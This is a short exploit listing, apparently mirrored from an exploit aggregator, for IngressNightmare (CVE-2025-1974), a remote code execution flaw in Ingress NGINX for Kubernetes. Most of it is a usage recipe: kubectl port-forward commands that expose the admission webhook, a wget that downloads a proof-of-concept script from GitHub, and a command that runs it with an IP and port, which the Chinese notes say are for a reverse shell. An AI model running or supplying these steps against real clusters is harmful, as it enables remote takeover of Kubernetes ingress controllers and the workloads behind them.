Exploit for CVE-2025-1974

## https://sploitus.com/exploit?id=46E6ED41-B76E-5B24-80CD-3B604BD0FA0E
# POC of IngressNightmare, RCE in Ingress NGINX (CVE-2025-1974)


> Developed from:
- https://github.com/zwxxb/CVE-2025-1974/blob/main/poc.py
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities#how-did-we-discover-ingressnightmare-24

Thanks


# 使用说明
```python
# forward the admission webhook
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller 8080:80 &
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 9443:443 &


# python3 -m pip install -r requirements.txt
python3 -m pip install httpx asyncio
wget -c https://github.com/hi-unc1e/CVE-2025-1974-poc/raw/refs/heads/master/poc.py
python3 poc.py --local --ip 192.168.49.1 --port 4444  --admission-port 9443
```


参数说明：
- `ip`、`port`，反弹 shell 用
- `admission-port`，默认是 8443

执行效果：

![image](image.png)